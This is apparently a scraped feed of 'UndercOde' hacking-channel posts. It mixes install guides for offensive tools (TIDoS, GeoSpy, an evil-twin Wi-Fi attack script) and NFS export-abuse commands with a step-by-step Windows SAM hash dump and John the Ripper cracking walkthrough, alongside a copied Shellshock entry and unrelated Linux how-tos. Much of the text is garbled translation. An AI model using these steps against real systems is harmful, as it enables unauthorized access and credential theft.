▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated 2020 repo for web pentesting api
pinterest.com/UndercOdeOfficial

🦑FEATURES :

1) A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.

2) Has 5 main phases, subdivided into 14 sub-phases consisting a total of 108 modules.

3) Reconnaissance Phase has 50 modules of its own (including active and passive recon, information disclosure modules).

4) Scanning & Enumeration Phase has got 16 modules (including port scans, WAF analysis, etc)

5) Vulnerability Analysis Phase has 37 modules (including most common vulnerabilites in action).

6) Exploits Castle has only 1 exploit. (purely developmental)
And finally, Auxillaries have got 4 modules. more under development

7) All four phases each have a Auto-Awesome module which automates every module for you.

8) You just need the domain, and leave everything is to this tool.
TIDoS has full verbose out support, so you'll know whats going on.

9) Fully user friendly interaction environment. (no shits)

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


Presently, for installing globally, you will need to default your Python version to 2.x. However, the work of migration from Python2 to Python3 is already underway.

1) Clone the repository locally and navigate there:

> git clone https://github.com/0xinfection/tidos-framework.git

2) cd tidos-framework

3) Install the dependencies:

> chmod +x install

4) ./install

🦑Now lets run the tool:

TIDoS needs some libraries to run, which can be installed via aptitude or yum Package Managers.

1) sudo apt-get install libncurses5 libxml2 nmap tcpdump libexiv2-dev build-essential python-pip python-xmpp

2) Now after these dependencies are finished installing, we need to install the remaining Python Package dependencies, hence run:

> pip2 install -r requirements.txt
Thats it. You now have TIDoS at your service. Fire it up using:

3) python2 tidos.py

🦑 Docker image :
You can build it from Dockerfile :

1> git clone https://github.com/0xinfection/tidos-framework.git

2> cd tidos-framework/docker

3> docker build -r tidos .

> To run TIDoS :

> docker run --interactive --tty --rm tidos bash
tidos

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is CVE-2014-6271 Detail >?
This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
>Written by Undercode- Powered by Gov Site
t.me/UndercOdeTesting

𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

🦑 Current Description

1) GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables,

2) which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka


3) "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

🦑References to Advisories, Solutions, and Tools :

1) By selecting these links, you will be leaving NIST webspace.

2) We have provided these links to other web sites because they may have information that would be of interest to you.

3) No inferences should be drawn on account of other sites being referenced, or not, from this page. T

4) here may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites


Hyperlink Resource
http://advisories.mageia.org/MGASA-2014-0388.html Third Party Advisory
http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html Third Party Advisory
http://jvn.jp/en/jp/JVN55667175/index.html Vendor Advisory
http://jvndb.jvn.jp/jvndb/JVNDB-2014-000126 Third Party Advisory VDB Entry Vendor Advisory
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10673 Third Party Advisory
http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html Third Party Advisory
http://linux.oracle.com/errata/ELSA-2014-1293.html Third Party Advisory
http://linux.oracle.com/errata/ELSA-2014-1294.html Third Party Advisory
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.html Third Party Advisory
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.html Third Party Advisory
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.html Third Party Advisory
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.html Third Party Advisory
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.html Third Party Advisory
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html Third Party Advisory
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.html Third Party Advisory
http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.html Third Party Advisory
http://lists.opensuse.org/opensuse-updates/2014-10/msg00023.html Third Party Advisory
http://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html Third Party Advisory
http://marc.info/?l=bugtraq&m=141216207813411&w=2 Third Party Advisory
http://marc.info/?l=bugtraq&m=141216668515282&w=2 Third Party Advisory
http://marc.info/?l=bugtraq&m=141235957116749&w=2 Third Party Advisory
http://marc.info/?l=bugtraq&m=141319209015420&w=2 Third Party Advisory
http://marc.info/?l=bugtraq&m=141330425327438&w=2

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The web pentesting- script lastest post by undercode include CVE-2014-6271 -Verified by UndercOde so use for learn only 😁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVE identifiers :
MITRE Corporation's documentation defines CVE Identifiers (also called "CVE names", "CVE numbers", "CVE-IDs", and "CVEs") as unique, common identifiers for publicly known information-security vulnerabilities in publicly released software packages.
twitter.com/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Syntax::

1> In order to support CVE ID's beyond CVE-YEAR-9999 (aka the CVE10k problem, cf. year 10,000 problem) a change was made to the CVE syntax in 2014 and took effect on Jan 13, 2015

2>The new CVE-ID syntax is variable length and includes:

CVE prefix + Year + Arbitrary Digits

3> NOTE: The variable length arbitrary digits will begin at four (4) fixed digits and expand with arbitrary digits only when needed in a calendar year, for example, CVE-YYYY-NNNN and if needed CVE-YYYY-NNNNN, CVE-YYYY-NNNNNN, and so on. This also means there will be no changes needed to previously assigned CVE-IDs, which all include a minimum of 4 digits.

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to change Xwin's refresh rate bny UndercOde
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) If you are using Redhat your X window configuration file is / etc / X11 / XF86Config Slackware's X Window configuration file is / etc / XF86Config

🦑 In that file you will see something like this:

# 640x400 @ 70 Hz , 31.5 kHz hsync Modeline "640x400" 25.175 640 664 760 800 400 409 411 450 # 640x480 @ 60 Hz, 31.5 kHz hsync Modeline "640x480" 25.175 640 664 760 800 480 491 493 525 # 800x600 @ 56 Hz, 35.15 kHz hsync ModeLine " 800x600 "36 800 824 896 1024 600 601 603 625 # 1024x768 @ 87 Hz interlaced, 35.5 kHz hsync Modeline" 1024x768 "44.9 1024 1048 1208 1264 768 776 784 817 Interlace

# 640x480 @ 72 Hz, 36.5 kHz hsync Modeline" 640x480 "31.5 640 680 720 864 480 488 491 521 # 800x600 @ 60 Hz, 37.8 kHz hsync Modeline “800x600” 40 800 840 968 1056 600 601 605 628 + hsync + vsync

# 800x600 @ 72 Hz, 48.0 kHz hsync Modeline "800x600" 50 800 856 976 1040 600 637 643 666 + hsync + vsync # 1024x768 @ 60 Hz, 48.4 kHz hsync Modeline "1024x768" 65 1024 1032 1176 1344 768 771 777 806 -hsync -vsync

# 1024x768 @ 70 Hz, 56.5 kHz hsync Modeline "1024x768" 75 1024 1048 1184 1328 768 771 777 806 -hsync -vsync # 1280x1024 @ 87 Hz interlaced, 51 kHz hsync Modeline "1280x1024" 80 1280 1296 1512 1568 1024 1025 1037 1165 Interlace

2) These things control the settings of your graphics card.

> For example, the following line notes that the resolution is 1280x1024 and the refresh rate is 76 Hz. The line scan frequency is 81.13 kilohertz # 1280x1024 @ 76 Hz, 81.13 kHz hsync Set the graphics card in this line: Modeline “1280x1024” 135 1280 1312 1416 1664 1024 1027 1030 1064

3) The meaning of each item in this line is as follows: (from the left To the right)

> mode line, resolution, pixel frequency (megahertz), number of pixels per line, clock cycle at which line synchronization (blanking) pulse starts, clock period at which line synchronization (blanking) pulse ends, The number of clock cycles, the number of image lines per frame, the number of scanning lines at the beginning of the frame synchronization pulse, the number of scanning lines at the end of the frame synchronization pulse, and the number of scanning lines per frame.

4) Adjust these numbers to make the most of your graphics card and monitor.

> For example, your graphics card has a megabyte of memory and you can set it to a resolution of 1152x900. :-) What you need to be careful of is to carefully check the scan frequency allowed by your monitor. Some monitors will burn the line scan transistor when they receive too high scan sync pulses. I have burned a display.

5) The transistor is not very easy to buy. The line scan transistor of a color TV is usually not available. The frequency is too low and the power is not high enough. :-( The

> next question is what pixel frequency your graphics card can use. For example, the above line requires 135MHz, but your card only has 125 MHz. It's over 125.

6) If there are multiple mode lines in your configuration file corresponding to the resolution you want, you can use # to seal other low-frequency mode lines, leaving only the frequencies you want. You can change the scanning frequency.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Infrared devices in Linux full bu UndercOde
This article mainly introduces the relationship between Infrared and Linux, and describes the types of Infrared and the protocols and architectures supported by Linux Infrared. Linux IrDA uses IrDA infrared wireless transmission to communicate with peripheral devices. These devices include printers, modems, fax machines, mobile phones, and today's applications on PDAs.
Pinterest.com/UndercOdeOfficial

🦑 The types of Infrared include:

1) SIR: Standard IR-115200bps (emulation Serial Port)

2) MIR: Middle IR-1.15Mbps

3) FIR: Fast IR-4Mbps

4) VFIR: Very Fast IR-16Mbpshgdi

5) Dongle: Infrared adapters for the serial port


🦑 Linux Infrared Supported protocols:
Linux The protocols supported by IrDA include

1) .IrLAP

2) .IrLMP

3) .IrIAS

4) .IrIAP

5) .IrLPT-transfers between printers

6) .IrCOMM-emulate Serial and Parallel port

7) .IrOBEX-object (file etc.) transmission

8) .IrLAN-infrared network device (HTTP etc.)

9). IrSocket

🦑 The architecture of IrMC Linux Infrared:

Since its development in 1997, Linux IrDA is basically divided into two parts:

1) Linux-IrDA source code integrated in the Linux kernel Kernel version 2.2.x ~

directory-
　　/ usr / src / linux / net / irda (protocal stuff)
　　/ usr / src / linux / drivers / net / irda (device drivers)
　　/ usr / src / linux / include / net / irda (header files)


2) Linux-IrDA tools.
PS. Currently throwing It is an experimental stage.

🦑 Linux system settings:

1) Edit file: /etc/conf.modules

#Irda
alias tty-ldisc-11 irtty
alias char-major-161 ircomm-tty
# post-install ircomm-tty /etc/rc.d /init.d/rc.irda autostart
# post-remove ircomm-tty /etc/rc.d/init.d/rc.irda autostop


2) Run: depmod -a


File the Edit: / etc / IrDA / your ON the IR Chip Drivers the depend.


3) The Run: depmod -a


🦑 HOW TO ?

In Case Dell Inspiron 5000

1) determines BIOS has IrDA enabled, and the recording system allocates resources (IRQ, DMA, I / O Port )


2) When recompiling Kernel
make menuconfig, IrDA modules are enabled, and check the protocols that need to be supported.

3) Install Irda-utils RPM

> irmanager: Detect peripheral infrared devices
irattach: Enable (mount) infrared
irdadump: Monitor the transmission between infrared devices
irdaping : Ping infrared peripheral device
irkbd: infrared keyboard

4) system is set with reference to the previous section

VI /etc/rc.config START_IRDA = Yes

LN -s /etc/rc.config /etc/rc.d/rd3.d/S99irda

the mknod / dev / irnine c 161 0

ln -s / dev / pilot / etc / irnine

E N J O Y
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑All Linux command: bzip2
bzip2
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Function description: Compression program for .bz2 file.

2) Syntax: bzip2 [-cdfhkLstvVz] [-repetitive-best] [-repetitive-fast] [-compression level] [files to be compressed]

3) Supplementary explanation: bzip2 uses a new compression algorithm, and the compression effect is better than traditional LZ77 / The LZ78 compression algorithm is good. If you do not add any parameters, bzip2 will generate a .bz2 compressed file after deleting the file, and delete the original file.

🦑 Parameters:

　-c or --stdout send compressed and decompressed results to standard output.

　-d or --decompress performs decompression.

　-f or --force bzip2 When compressing or decompressing, if the output file has the same name as an existing file, the preset file will not be overwritten by default. To override, use this parameter.

　-h or --help Display help.

　-k or --keep bzip2 deletes the original file after compression or
decompression. To keep the original file, use this parameter.

　-s or --small reduces the amount of memory used during program execution.

　-t or --test Test the integrity of the .bz2 compressed file.

　-v or --verbose Display detailed information when compressing or decompressing files.

　-z or --compress Force compression.

　-L, --license,

　-V or --version Display version information.

　--repetitive-best If there are repeated data in the file, you can use this parameter to improve the compression effect.

　--repetitive-fast If there is repeated information in the file, this parameter can be used to speed up the execution.

　-Compression level Block size when compressed.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

this pic source wiki - verified & posted by UndercOde- ALL CVE TYPES-2020 analysis

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 topic Geolocation Spy (GeoSpy) is an OSINT analysis and research tool that is used to track and execute
intelligent social engineering attacks in real time. It was created with the aim of teaching the world
show large Internet companies could obtain confidential information such as the status of sessions of their
websites or services and control their users through their browser, without their knowlege, but It evolves
with the aim of helping government organizations, companies and researchers to track the cybercriminals

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/entynetproject/geospy

2) cd geospy

3) chmod +x install.sh

4) ./install.sh

🦑 Commands:

Geolocation Spy execution
geospy -h

usage: geospy [-h] [-v] [-u URL] [-p PORT] [-ak ACCESSKEY] [-l LOCAL] [-n]
[-ic INJC] [-ud]

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Put the web page URL to clone.
-p PORT, --port PORT Insert your port.
-ak ACCESSKEY, --accesskey ACCESSKEY
Insert your custom Access Key.
-n, --ngrok Insert your ngrok Authtoken.
-ic INJC, --injectcode INJC
Insert your custom REST API path.
-ud, --update Update GeoSpy to the latest version.

🦑 Tested by UndercOde on

Ubuntu
debian

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Security issues with NFS services Full by UndercOde :
The NFS service of the Unix system is equivalent to the file sharing service on the MS system. Some people may think that this is an inappropriate analogy, but the two have surprisingly similar security issues.

> Just as many security problems on NT / Windows machines come from sharing Like resources, the misconfiguration of the NFS service can also allow your system to be taken over by intruders. NFS is built on the RPC (Remote Procedure Call) mechanism. Similarly, NT-based services on the RPC mechanism are not secure; they are shared for MS Resource attacks are currently the most popular NT attack method on the Internet. Attacks on NFS are also the most common method for UNix platform machines.
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

The insecurity of NFS is mainly reflected in the following 4 aspects:

1) Novice access control mechanism for NFS handy difficult to achieve control objectives accuracy difficult to achieve

2) NFS no real user authentication mechanism, but only authentication mechanism to process RPC / Mount request

3) earlier NFS allows unauthorized users to obtain a valid file handle

4) In a RPC remote call, a SUID program has superuser privileges.


Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Part 2 :Security issues with NFS services Full by UndercOde
We discuss them from these aspects:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) In the default case of most Unix systems When exporting a directory, if you do not specify read-only, the directory is writable; the NFS access control file is prone to misconfiguration. In many cases, it is configured to be accessible by any machine on the Internet. Remote users can use this command to It is found whether there is a configuration vulnerability in NFS. This command is a necessary step for almost all NFS attacks:

> showmount -e www.examl....com The
possible results are as follows:
/ usr (everyone)
/ export / target1 -access = target2
/ export / target2 -access = target1

2) You can mount the / usr directory on this NFS server to the local directory:
# mount www.exampl...com:/usr / tmp

3) This shows that the / usr directory can be mounted by any machine, and may even have write permissions; and / The export / target1 directory specifies host access restrictions, and must be a member of target2.exam,...com or a member of the Netgroup of target2 to mount.

4) Most intruders first use this command to query the NFS vulnerability on the target, just as the Netview command for NT It is worth reminding that the popular invasion method has changed from the previous attack method to determine the target to the method of invasion as long as there is opportunity for the opponent.

5) The intruder may write a script or a program using To scan a large range of addresses, list the results and report to yourself. Therefore, the correct configuration is very important. On the Internet, there are a lot of machines with wrong NFS settings. This configuration is generally stored in the / etc / exports file or / etc / dfs / dfstab.

6) The user authentication requested by the client from the client is composed of the user's UID and the GID of the group to which it belongs. This type of file access security verification is of course for systems without NFSIt is safe; but on the Internet, the root of other machines has the right to set such a UID on its own machine, and the NFS server does not matter whether the UID is on its own machine or not, as long as the UID matches, it will give this user operation on this file

🦑 EXample :

> For example, the directory / home / frank can only be opened for reading and writing by a user with a UID of 501, and this directory can be mounted by a remote machine.Then, the root user of this machine adds a user with a UID of 501, and then uses this The user logs in and mounts the directory, and can get the equivalent of 501 user operation permissions on the NFS server to read and write / home / frank. To solve this problem, you must properly configure exports, limit the host address of the customer, and explicitly set rw = host options, ro (read-only) options, and access = host options.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 the purpose is to make NFS file handles difficult to guess. This information is generated by the stat (2) system call. Unfortunately, this call is used A function vn_stat () has a problem:
t.me/UndercOdeTesting

...
sb-> st_gen = vap-> va_gen;
sb-> st_blocks = vap-> va_bytes / S_BLKSIZE;
return (0);} The

🦑 above program code is exposed to generate st_gen All the information of this number, using this information, unauthorized users can get the handle of the file. The correct program should only allow this information to be exposed to root:

...
sb-> st_flags = vap-> va_flags;
if (suser (p-> p_ucred, & p-> p_acflag)) {
sb-> st_gen = 0;
} else {
sb-> st_gen = vap-> va_gen;
}
sb-> st_blocks = vap-> va_bytes / S_BLKSIZE;
return (0);
} In

this way, if it is not root, he can only get 0.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Security issues with NFS services
>most dangerous error is to export the directory containing the SUID program, and the file has the execution right .SUID program itself is equivalent to superuser.
pinterest.com/UndercOdeOfficial

🦑 solution:

1) and remove any shared solution from the NT, the best solution is to ban NFS service, or AFS service instead (Andrew File System).

2) if Be sure to open NFS, do not allow a single machine to be both client and server;

3) The file system exported is only set to read-only

4) The execution of programs with SUID characteristics is prohibited

5) Do not export the home directory

6) Do not export Implementation feature

7) Use some secure NFS implementation (though not necessarily really secure)

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 updates Wifi hack 2019 automate various wireless networks
twitter.com/UndercOdeTC

🦑Features :

1) Capture victims' traffic.

2) MAC address spoofing.

3) Set-up honeypot and evil twin attacks.

4) Show the list of in range access points.

5) Wireless adapter|card|dongle power amplification.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/aress31/wirespy

2) go dir

3) chmod +x wirespy.sh

4) Run the script with root privileges:

> sudo ./wirespy.sh

Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack

🦑 Commands:

clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status

> Compatible with rooted Termux

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cracking Windows User Passwords
twitter.com/UNdercOdeTC


🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) the user name and password of the Windows system are stored in a SAM (Security Account Manager) file

> In Windows systems based on the NT kernel, including Windows 7 and later versions,

2) this file is saved in the "C: \ Windows \ System32 \ Config" directory. For security reasons, Microsoft has added some extra security measures to protect this file. First, after the operating system starts, the SAM file will be locked at the same time. This means that the user cannot open or copy the SAM file while the operating system is running. In addition to locking, the entire SAM file is encrypted and invisible.


3) Use John the Ripper tool to crack Windows user password.

a) Check the hard drive in the current system

> fdisk -l
The output shows that there is a disk in the current system and there is only one partition. The file system type is NTFS, which is also the disk that is stored in the Windows system.

b) Mount the hard drive. The execution command is as follows:
root@kali:~# mkdir /sda1
root@kali:~# mount /dev/sda1 /sda1/ /dev/sda1
After executing the above command, there is no output information.

c) Switch directories and enter the location of the Windows SAM file. The execution command is as follows:
root@kali:~# cd /sda1/WINDOWS/system32/config/
In this directory, you can see the SAM file.

d) Use SamDump2 to extract the SAM file. The execution command is as follows:
root@kali:/sda1/WINDOWS/system32/config# samdump2 utc system > /root/hash.txt

You can see from the output that the SAM file is extracted. Redirected the contents of the file to the /root/hash.txt file.

e) Run the john command to implement a password attack. The execution command is as follows:
root@kali:/sda1/WINDOWS/system32/config# /usr/sbin/john /root/hash.txt --format=nt
Created directory: /root/.undercode
Loaded 6 password hashes with no
different salts (NT MD4 [128/128 SSE2 + 32/32])
(Guest)
guesses: 4 time: 0:00:03:13 0.09% (3) (ETA: Mon May 12 06:46:42 2014) c/s: 152605K trying: 2KRIN.P - 2KRIDY8
guesses: 4 time: 0:00:04:26 0.13% (3) (ETA: Mon May 12 04:02:53 2014) c/s: 152912K trying: GR0KUHI - GR0KDN1
guesses: 4 time: 0:00:04:27 0.13% (3) (ETA: Mon May 12 04:15:42 2014) c/s: 152924K trying: HKCUUHT - HKCUGDS

THAT IT !
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁